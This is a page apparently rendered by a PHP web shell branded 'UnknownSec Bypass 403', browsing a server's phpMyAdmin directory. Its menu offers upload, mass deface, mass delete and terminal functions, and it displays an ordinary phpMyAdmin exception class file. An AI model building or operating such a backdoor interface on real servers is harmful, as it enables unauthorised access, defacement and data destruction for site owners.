UnknownSec Bypass
403
:
/
usr
/
share
/
phpmyadmin
/
libraries
/
classes
/
Di
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
NotFoundException.php
<?php /* vim: set expandtab sw=4 ts=4 sts=4: */ /** * Holds the PhpMyAdmin\Di\NotFoundException class * * @package PhpMyAdmin\Di */ namespace PhpMyAdmin\Di; use Psr\Container\NotFoundExceptionInterface; /** * Class NotFoundException * * @package PhpMyAdmin\Di */ class NotFoundException extends ContainerException implements NotFoundExceptionInterface { }
Copyright © 2025 - UnknownSec